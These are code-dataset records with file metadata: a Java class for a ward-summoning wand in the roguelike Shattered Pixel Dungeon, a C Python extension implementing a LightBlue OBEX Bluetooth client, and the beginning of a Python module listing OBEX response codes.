"qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 1, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/wands/WandOfWarding.java | package com.shatteredpixel.shatteredpixeldungeon.items.wands;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.npcs.NPC;
import com.shatteredpixel.shatteredpixeldungeon.effects.MagicMissile;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.MagesStaff;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.sprites.WardSprite;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndOptions;
import com.watabou.noosa.Game;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundle;
import com.watabou.utils.Callback;
import com.watabou.utils.PathFinder;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class WandOfWarding extends Wand {
{
collisionProperties = Ballistica.STOP_TARGET;
image = ItemSpriteSheet.WAND_WARDING;
}
private boolean wardAvailable = true;
@Override
public boolean tryToZap(Hero owner, int target) {
int currentWardEnergy = 0;
for (Char ch : Actor.chars()){
if (ch instanceof Ward){
currentWardEnergy += ((Ward) ch).tier + 1;
}
}
int maxWardEnergy = 0;
for (Buff buff : curUser.buffs()){
if (buff instanceof Wand.Charger){
if (((Charger) buff).wand() instanceof WandOfWarding){
maxWardEnergy += 3 + ((Charger) buff).wand().level();
}
}
}
wardAvailable = (currentWardEnergy < maxWardEnergy);
Char ch = Actor.findChar(target);
if (ch instanceof Ward){
if (!wardAvailable && ((Ward) ch).tier <= 3){
GLog.w( Messages.get(this, "no_more_wards"));
return false;
}
} else {
if ((currentWardEnergy + 2) > maxWardEnergy){
GLog.w( Messages.get(this, "no_more_wards"));
return false;
}
}
return super.tryToZap(owner, target);
}
@Override
protected void onZap(Ballistica bolt) {
Char ch = Actor.findChar(bolt.collisionPos);
if (!curUser.fieldOfView[bolt.collisionPos] || !Dungeon.level.passable[bolt.collisionPos]){
GLog.w( Messages.get(this, "bad_location"));
} else if (ch != null){
if (ch instanceof Ward){
if (wardAvailable) {
((Ward) ch).upgrade(level());
} else {
((Ward) ch).wandHeal( level() );
}
ch.sprite.emitter().burst(MagicMissile.WardParticle.UP, ((Ward) ch).tier);
} else {
GLog.w( Messages.get(this, "bad_location"));
}
} else if (canPlaceWard(bolt.collisionPos)){
Ward ward = new Ward();
ward.pos = bolt.collisionPos;
ward.wandLevel = level();
GameScene.add(ward, 1f);
Dungeon.level.occupyCell(ward);
ward.sprite.emitter().burst(MagicMissile.WardParticle.UP, ward.tier);
} else {
GLog.w( Messages.get(this, "bad_location"));
}
}
@Override
protected void fx(Ballistica bolt, Callback callback) {
MagicMissile m = MagicMissile.boltFromChar(curUser.sprite.parent,
MagicMissile.WARD,
curUser.sprite,
bolt.collisionPos,
callback);
if (bolt.dist > 10){
m.setSpeed(bolt.dist*20);
}
Sample.INSTANCE.play(Assets.SND_ZAP);
}
@Override
public void onHit(MagesStaff staff, Char attacker, Char defender, int damage) {
int level = Math.max( 0, staff.level() );
// lvl 0 - 20%
// lvl 1 - 33%
// lvl 2 - 43%
if (Random.Int( level + 5 ) >= 4) {
for (Char ch : Actor.chars()){
if (ch instanceof Ward){
((Ward) ch).wandHeal(staff.level());
ch.sprite.emitter().burst(MagicMissile.WardParticle.UP, ((Ward) ch).tier);
}
}
}
}
@Override
public void staffFx(MagesStaff.StaffParticle particle) {
particle.color( 0x8822FF );
particle.am = 0.3f;
particle.setLifespan(3f);
particle.speed.polar(Random.Float(PointF.PI2), 0.3f);
particle.setSize( 1f, 2f);
particle.radiateXY(2.5f);
}
public static boolean canPlaceWard(int pos){
for (int i : PathFinder.CIRCLE8){
if (Actor.findChar(pos+i) instanceof Ward){
return false;
}
}
return true;
}
@Override
public String statsDesc() {
if (levelKnown)
return Messages.get(this, "stats_desc", level()+3);
else
return Messages.get(this, "stats_desc", 3);
}
public static class Ward extends NPC {
public int tier = 1;
private int wandLevel = 1;
private int totalZaps = 0;
{
spriteClass = WardSprite.class;
alignment = Alignment.ALLY;
properties.add(Property.IMMOVABLE);
viewDistance = 3;
state = WANDERING;
name = Messages.get(this, "name_" + tier );
}
public void upgrade( int wandLevel ){
if (this.wandLevel < wandLevel){
this.wandLevel = wandLevel;
}
wandHeal(0);
switch (tier){
case 1: case 2: default:
break; //do nothing
case 3:
HP = HT = 30;
break;
case 4:
HT = 48;
HP = Math.round(48*(HP/30f));
break;
case 5:
HT = 70;
HP = Math.round(70*(HP/48f));
break;
}
if (tier < 6){
tier++;
viewDistance++;
name = Messages.get(this, "name_" + tier );
updateSpriteState();
GameScene.updateFog(pos, viewDistance+1);
}
}
private void wandHeal( int wandLevel ){
if (this.wandLevel < wandLevel){
this.wandLevel = wandLevel;
}
switch(tier){
default:
break;
case 4:
HP = Math.min(HT, HP+6);
break;
case 5:
HP = Math.min(HT, HP+8);
break;
case 6:
HP = Math.min(HT, HP+12);
break;
}
}
@Override
public int defenseSkill(Char enemy) {
if (tier > 3){
defenseSkill = 4 + Dungeon.depth;
}
return super.defenseSkill(enemy);
}
@Override
public int drRoll() {
if (tier > 3){
return Math.round(Random.NormalIntRange(0, 3 + Dungeon.depth/2) / (7f - tier));
} else {
return 0;
}
}
@Override
protected float attackDelay() {
switch (tier){
case 1: case 2: default:
return 2f;
case 3: case 4:
return 1.5f;
case 5: case 6:
return 1f;
}
}
@Override
protected boolean canAttack( Char enemy ) {
return new Ballistica( pos, enemy.pos, Ballistica.MAGIC_BOLT).collisionPos == enemy.pos;
}
@Override
protected boolean doAttack(Char enemy) {
boolean visible = fieldOfView[pos] || fieldOfView[enemy.pos];
if (visible) {
sprite.zap( enemy.pos );
} else {
zap();
}
return !visible;
}
private void zap() {
spend( 1f );
//always hits
int dmg = Random.NormalIntRange( 2 + wandLevel, 8 + 4*wandLevel );
enemy.damage( dmg, WandOfWarding.class );
if (enemy.isAlive()){
Wand.processSoulMark(enemy, wandLevel, 1);
}
if (!enemy.isAlive() && enemy == Dungeon.hero) {
Dungeon.fail( getClass() );
}
totalZaps++;
switch(tier){
case 1: default:
if (totalZaps >= tier){
die(this);
}
break;
case 2: case 3:
if (totalZaps > tier){
die(this);
}
break;
case 4:
damage(5, this);
break;
case 5:
damage(6, this);
break;
case 6:
damage(7, this);
break;
}
}
public void onZapComplete() {
zap();
next();
}
@Override
protected boolean getCloser(int target) {
return false;
}
@Override
protected boolean getFurther(int target) {
return false;
}
@Override
public CharSprite sprite() {
WardSprite sprite = (WardSprite) super.sprite();
sprite.linkVisuals(this);
return sprite;
}
@Override
public void updateSpriteState() {
super.updateSpriteState();
((WardSprite)sprite).updateTier(tier);
sprite.place(pos);
}
@Override
public void destroy() {
super.destroy();
Dungeon.observe();
GameScene.updateFog(pos, viewDistance+1);
}
@Override
public boolean canInteract(Hero h) {
return true;
}
@Override
public boolean interact() {
Game.runOnRenderThread(new Callback() {
@Override
public void call() {
GameScene.show(new WndOptions( Messages.get(Ward.this, "dismiss_title"),
Messages.get(Ward.this, "dismiss_body"),
Messages.get(Ward.this, "dismiss_confirm"),
Messages.get(Ward.this, "dismiss_cancel") ){
@Override
protected void onSelect(int index) {
if (index == 0){
die(null);
}
}
});
}
});
return true;
}
@Override
public String description() {
return Messages.get(this, "desc_" + tier, 2+wandLevel, 8 + 4*wandLevel );
}
private static final String TIER = "tier";
private static final String WAND_LEVEL = "wand_level";
private static final String TOTAL_ZAPS = "total_zaps";
@Override
public void storeInBundle(Bundle bundle) {
super.storeInBundle(bundle);
bundle.put(TIER, tier);
bundle.put(WAND_LEVEL, wandLevel);
bundle.put(TOTAL_ZAPS, totalZaps);
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
tier = bundle.getInt(TIER);
viewDistance = 2 + tier;
name = Messages.get(this, "name_" + tier );
wandLevel = bundle.getInt(WAND_LEVEL);
totalZaps = bundle.getInt(TOTAL_ZAPS);
}
{
properties.add(Property.IMMOVABLE);
}
}
}
| 9,650 | WandOfWarding | java | de | java | code | {"qsc_code_num_words": 1095, "qsc_code_num_chars": 9650.0, "qsc_code_mean_word_length": 5.78812785, "qsc_code_frac_words_unique": 0.22374429, "qsc_code_frac_chars_top_2grams": 0.03408015, "qsc_code_frac_chars_top_3grams": 0.10792048, "qsc_code_frac_chars_top_4grams": 0.1180183, "qsc_code_frac_chars_dupe_5grams": 0.2631745, "qsc_code_frac_chars_dupe_6grams": 0.14136952, "qsc_code_frac_chars_dupe_7grams": 0.11912275, "qsc_code_frac_chars_dupe_8grams": 0.09324708, "qsc_code_frac_chars_dupe_9grams": 0.08094036, "qsc_code_frac_chars_dupe_10grams": 0.03250237, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01468082, "qsc_code_frac_chars_whitespace": 0.20943005, "qsc_code_size_file_byte": 9650.0, "qsc_code_num_lines": 416.0, "qsc_code_num_chars_line_max": 94.0, "qsc_code_num_chars_line_mean": 23.19711538, "qsc_code_frac_chars_alphabet": 0.81609647, "qsc_code_frac_chars_comments": 0.00694301, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.27428571, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01878326, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00083481, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.08, "qsc_codejava_score_lines_no_logic": 0.18571429, "qsc_codejava_frac_words_no_modifier": 0.96551724, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/linux/lightblueobex_client.c | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
#include "lightblueobex_client.h"
#include "lightblueobex_main.h"
#include "structmember.h"
typedef struct {
PyObject_HEAD
obex_t *obex;
int busy;
int timeout;
int sendbufsize;
int resp;
PyObject *resp_headers;
PyObject *error;
PyObject *error_msg;
PyObject *fileobj;
PyObject *tempbuf;
} OBEXClient;
static void
obexclient_requestcleanup(OBEXClient *self)
{
DEBUG("%s()\n", __func__);
Py_XDECREF(self->fileobj);
self->fileobj = NULL;
Py_XDECREF(self->tempbuf);
self->tempbuf = NULL;
}
static void
obexclient_seterror(OBEXClient *self, PyObject *exc, char *message)
{
DEBUG("%s()\n", __func__);
if (exc == NULL)
DEBUG("\t(resetting error)\n");
else
DEBUG("\tError: %s\n", (message == NULL ? "(unknown)" : message));
if (self->error != NULL) {
DEBUG("\tIgnore new error, error already set!\n");
return;
}
Py_XDECREF(self->error);
Py_XINCREF(exc);
self->error = exc;
Py_XDECREF(self->error_msg);
self->error_msg = ( message == NULL ? PyString_FromString("error") :
PyString_FromString(message) );
}
static void
obexclient_feedstream(OBEXClient *self, obex_object_t *obj)
{
/*
self->fileobj shouldn't be NULL since startrequest() doesn't set
OBEX_FL_STREAM_START (and so this shouldn't be called) if fileobj is null
*/
Py_XDECREF(self->tempbuf);
self->tempbuf = lightblueobex_filetostream(self->obex, obj, self->fileobj,
self->sendbufsize);
if (self->tempbuf == NULL) {
obexclient_seterror(self, PyExc_IOError, "error reading file object");
}
}
static void
obexclient_readstream(OBEXClient *self, obex_object_t *obj)
{
int result;
result = lightblueobex_streamtofile(self->obex, obj, self->fileobj);
if (result < 0) {
obexclient_seterror(self, PyExc_IOError,
"error writing to file object");
}
}
static void
obexclient_requestdone(OBEXClient *self, obex_object_t *obj, int obex_cmd, int obex_rsp)
{
DEBUG("%s()\n", __func__);
DEBUG("\tCommand: %d Response: 0x%02x\n", obex_cmd, obex_rsp);
self->resp = obex_rsp;
Py_XDECREF(self->resp_headers);
self->resp_headers = lightblueobex_readheaders(self->obex, obj);
if (self->resp_headers == NULL)
PyErr_SetString(PyExc_IOError, "error reading response headers");
obexclient_requestcleanup(self);
self->busy = 0;
}
/* can this be static? */
void
obexclient_event(obex_t *handle, obex_object_t *obj, int mode, int event, int obex_cmd, int obex_rsp)
{
DEBUG("%s()\n", __func__);
DEBUG("\tEvent: %d Command: %d\n", event, obex_cmd);
OBEXClient *self = (OBEXClient *)OBEX_GetUserData(handle);
switch (event) {
case OBEX_EV_LINKERR:
case OBEX_EV_PARSEERR:
obexclient_seterror(self, PyExc_IOError, (event == OBEX_EV_LINKERR ?
"connection error" : "parse error"));
if (obj != NULL) { /* check a request is in progress */
obexclient_requestdone(self, obj, obex_cmd, obex_rsp);
}
break;
case OBEX_EV_STREAMEMPTY:
obexclient_feedstream(self, obj);
break;
case OBEX_EV_STREAMAVAIL:
obexclient_readstream(self, obj);
break;
case OBEX_EV_REQDONE:
obexclient_requestdone(self, obj, obex_cmd, obex_rsp);
break;
default:
/* ignore abort for now - can't be done with synchronous requests */
break;
}
}
static int
obexclient_startrequest(OBEXClient *self, int cmd, PyObject *headers, PyObject *nonhdrdata)
{
const uint8_t *nonhdrdata_raw;
Py_ssize_t nonhdrdata_len;
DEBUG("%s()\n", __func__);
if (!PyDict_Check(headers)) {
PyErr_Format(PyExc_TypeError, "headers must be dict, was %s",
headers->ob_type->tp_name);
return -1;
}
if (nonhdrdata != Py_None && !PyBuffer_Check(nonhdrdata)) {
PyErr_Format(PyExc_TypeError,
"nonhdrdata must be buffer or None, was %s",
nonhdrdata->ob_type->tp_name);
return -1;
}
if (self->busy) {
PyErr_SetString(PyExc_IOError, "another request is in progress");
return -1;
}
obex_object_t *obj = OBEX_ObjectNew(self->obex, cmd);
if (obj == NULL) {
PyErr_SetString(PyExc_IOError, "error starting new request");
return -1;
}
if (lightblueobex_addheaders(self->obex, headers, obj) < 0) {
OBEX_ObjectDelete(self->obex, obj);
PyErr_SetString(PyExc_IOError, "error setting request headers");
return -1;
}
if (nonhdrdata != Py_None) {
if (PyObject_AsReadBuffer(nonhdrdata, (const void **)&nonhdrdata_raw,
&nonhdrdata_len) < 0) {
/* PyObject_AsReadBuffer() sets exception if error */
OBEX_ObjectDelete(self->obex, obj);
return -1;
}
if (OBEX_ObjectSetNonHdrData(obj, nonhdrdata_raw, nonhdrdata_len) < 0) {
OBEX_ObjectDelete(self->obex, obj);
PyErr_SetString(PyExc_IOError,
"error setting request non-header data");
return -1;
}
}
if (self->fileobj != NULL) {
if (cmd == OBEX_CMD_PUT) {
/* don't stream data if there is no fileobj (i.e. a Put-Delete) */
obex_headerdata_t hv;
if (OBEX_ObjectAddHeader(self->obex, obj, OBEX_HDR_BODY, hv, 0,
OBEX_FL_STREAM_START) < 0) {
PyErr_SetString(PyExc_IOError,
"error setting streaming mode for Put");
return -1;
}
} else if (cmd == OBEX_CMD_GET) {
if (OBEX_ObjectReadStream(self->obex, obj, NULL) < 0) {
PyErr_SetString(PyExc_IOError,
"error setting streaming mode for Get");
return -1;
}
}
}
/* reset data for the new request */
self->busy = 1;
obexclient_seterror(self, NULL, NULL);
self->resp = 0x20;
Py_XDECREF(self->resp_headers);
self->resp_headers = NULL;
if (OBEX_Request(self->obex, obj) < 0) {
PyErr_SetString(PyExc_IOError, "error sending request");
return -1;
}
return 1;
}
static PyObject *
OBEXClient_request(OBEXClient *self, PyObject *args)
{
PyObject *tmp;
int result;
int cmd;
PyObject *headers;
PyObject *nonhdrdata;
PyObject *fileobj = NULL; /* optional */
DEBUG("%s()\n", __func__);
if (!PyArg_ParseTuple(args, "iO!O|O", &cmd, &PyDict_Type, &headers,
&nonhdrdata, &fileobj)) {
return NULL;
}
if (fileobj != NULL) {
char *method;
method = ( cmd == OBEX_CMD_PUT ? "read" : "write" );
if (!PyObject_HasAttrString(fileobj, method)) {
PyErr_Format(PyExc_AttributeError,
"file-like object must have %s() method", method);
return NULL;
}
tmp = self->fileobj;
Py_INCREF(fileobj);
self->fileobj = fileobj;
Py_XDECREF(tmp);
}
if (obexclient_startrequest(self, cmd, headers, nonhdrdata) < 0) {
obexclient_requestcleanup(self);
return NULL;
}
/* wait until request is complete */
while (self->busy) {
result = OBEX_HandleInput(self->obex, self->timeout);
if (result < 0) {
obexclient_requestcleanup(self);
obexclient_seterror(self, PyExc_IOError, "error processing input");
break;
} else if (result == 0) {
obexclient_requestcleanup(self);
obexclient_seterror(self, PyExc_IOError,
"input processing timed out");
break;
}
}
/* request is now complete, obexclient_requestcleanup() will have been
called */
if (self->error) {
PyErr_SetObject(self->error, self->error_msg);
return NULL;
}
/* Don't throw exceptions for non-success responses.
The caller can decide whether that should be done. */
return Py_BuildValue("(iO)", self->resp, self->resp_headers);
}
PyDoc_STRVAR(OBEXClient_request__doc__,
"request(opcode, headers, nonheaderdata [, fileobj]) -> response\n\n\
Sends an OBEX request and returns the server response code. \
Provide a file-like object if performing a Put or Get request. \
The nonheaderdata is really only useful for specifying the flags for SetPath \
requests. For other requests, set this value to None.");
static PyObject *
OBEXClient_new(PyTypeObject *type, PyObject *args, PyObject *kwds)
{
OBEXClient *self;
self = (OBEXClient *)type->tp_alloc(type, 0);
if (self != NULL) {
self->obex = NULL;
self->busy = 0;
self->timeout = 10; /* seconds */
self->sendbufsize = 4096;
self->resp = 0;
self->resp_headers = NULL;
self->error = NULL;
self->error_msg = PyString_FromString("");
if (self->error_msg == NULL) {
Py_DECREF(self);
return NULL;
}
self->fileobj = NULL;
self->tempbuf = NULL;
}
return (PyObject *)self;
}
static int
OBEXClient_init(OBEXClient *self, PyObject *args, PyObject *kwds)
{
int fd = -1;
int writefd = -1;
int mtu = 1024;
unsigned int flags = 0;
static char *kwlist[] = { "fd", "writefd", "mtu", "flags", NULL };
if (!PyArg_ParseTupleAndKeywords(args, kwds, "i|iiI", kwlist,
&fd, &writefd, &mtu, &flags)) {
return -1;
}
if (self->obex == NULL) {
self->obex = OBEX_Init(OBEX_TRANS_FD, obexclient_event, flags);
if (self->obex == NULL) {
PyErr_SetString(PyExc_IOError, "error creating OBEX object");
return -1;
}
if (writefd == -1)
writefd = fd;
if (FdOBEX_TransportSetup(self->obex, fd, writefd, mtu) < 0) {
PyErr_SetString(PyExc_IOError, "error initialising transport");
return -1;
}
}
OBEX_SetUserData(self->obex, self);
OBEX_SetTransportMTU(self->obex, OBEX_MAXIMUM_MTU, OBEX_MAXIMUM_MTU);
return 0;
}
static void
OBEXClient_dealloc(OBEXClient *self)
{
DEBUG("%s()\n", __func__);
if (self->obex)
OBEX_Cleanup(self->obex);
Py_XDECREF(self->error);
Py_XDECREF(self->error_msg);
Py_XDECREF(self->fileobj);
Py_XDECREF(self->tempbuf);
self->ob_type->tp_free((PyObject *)self);
}
static PyMemberDef OBEXClient_members[] = {
{"timeout", T_INT, offsetof(OBEXClient, timeout), 0,
"timeout for each request"},
{"sendbufsize", T_INT, offsetof(OBEXClient, sendbufsize), 0,
"size of each data chunk to read from the file object for a Put request"},
{NULL} /* Sentinel */
};
static PyMethodDef OBEXClient_methods[] = {
{ "request", (PyCFunction)OBEXClient_request, METH_VARARGS,
OBEXClient_request__doc__,
},
{NULL} /* Sentinel */
};
static PyTypeObject OBEXClientType = {
PyObject_HEAD_INIT(NULL)
0, /*ob_size*/
"obexclient.OBEXClient", /*tp_name*/
sizeof(OBEXClient), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)OBEXClient_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_compare*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash */
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/
"An OBEX client class.", /* tp_doc */
0, /* tp_traverse */
0, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
OBEXClient_methods, /* tp_methods */
OBEXClient_members, /* tp_members */
0, /* tp_getset */
0, /* tp_base */
0, /* tp_dict */
0, /* tp_descr_get */
0, /* tp_descr_set */
0, /* tp_dictoffset */
(initproc)OBEXClient_init, /* tp_init */
0, /* tp_alloc */
OBEXClient_new, /* tp_new */
};
PyTypeObject *lightblueobex_getclienttype(void)
{
return &OBEXClientType;
}
| 13,717 | lightblueobex_client | c | en | c | code | {"qsc_code_num_words": 1526, "qsc_code_num_chars": 13717.0, "qsc_code_mean_word_length": 4.98885976, "qsc_code_frac_words_unique": 0.23656619, "qsc_code_frac_chars_top_2grams": 0.01103376, "qsc_code_frac_chars_top_3grams": 0.02679627, "qsc_code_frac_chars_top_4grams": 0.03415211, "qsc_code_frac_chars_dupe_5grams": 0.24720872, "qsc_code_frac_chars_dupe_6grams": 0.17890451, "qsc_code_frac_chars_dupe_7grams": 0.10679102, "qsc_code_frac_chars_dupe_8grams": 0.08432944, "qsc_code_frac_chars_dupe_9grams": 0.0740838, "qsc_code_frac_chars_dupe_10grams": 0.0617365, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00935955, "qsc_code_frac_chars_whitespace": 0.30677262, "qsc_code_size_file_byte": 13717.0, "qsc_code_num_lines": 454.0, "qsc_code_num_chars_line_max": 102.0, "qsc_code_num_chars_line_mean": 30.21365639, "qsc_code_frac_chars_alphabet": 0.79125039, "qsc_code_frac_chars_comments": 0.14748123, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.32394366, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.08371815, "qsc_code_frac_chars_long_word_length": 0.0036771, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00034206, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.03943662, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.09014085, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": 0.01408451} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/linux/_obexcommon.py | # Copyright (c) 2009 Bea Lam. All rights reserved.
#
# This file is part of LightBlue.
#
# LightBlue is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LightBlue is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
import _lightbluecommon
__all__ = ('OBEXResponse', 'OBEXError',
'CONTINUE', 'OK', 'CREATED', 'ACCEPTED', 'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT', 'RESET_CONTENT', 'PARTIAL_CONTENT',
'MULTIPLE_CHOICES', 'MOVED_PERMANENTLY', 'MOVED_TEMPORARILY', 'SEE_OTHER',
'NOT_MODIFIED', 'USE_PROXY',
'BAD_REQUEST', 'UNAUTHORIZED', 'PAYMENT_REQUIRED', 'FORBIDDEN',
'NOT_FOUND', 'METHOD_NOT_ALLOWED', 'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED', 'REQUEST_TIME_OUT', 'CONFLICT', 'GONE',
'LENGTH_REQUIRED', 'PRECONDITION_FAILED', 'REQUESTED_ENTITY_TOO_LARGE',
'REQUEST_URL_TOO_LARGE', 'UNSUPPORTED_MEDIA_TYPE',
'INTERNAL_SERVER_ERROR', 'NOT_IMPLEMENTED', 'BAD_GATEWAY',
'SERVICE_UNAVAILABLE', 'GATEWAY_TIMEOUT', 'HTTP_VERSION_NOT_SUPPORTED',
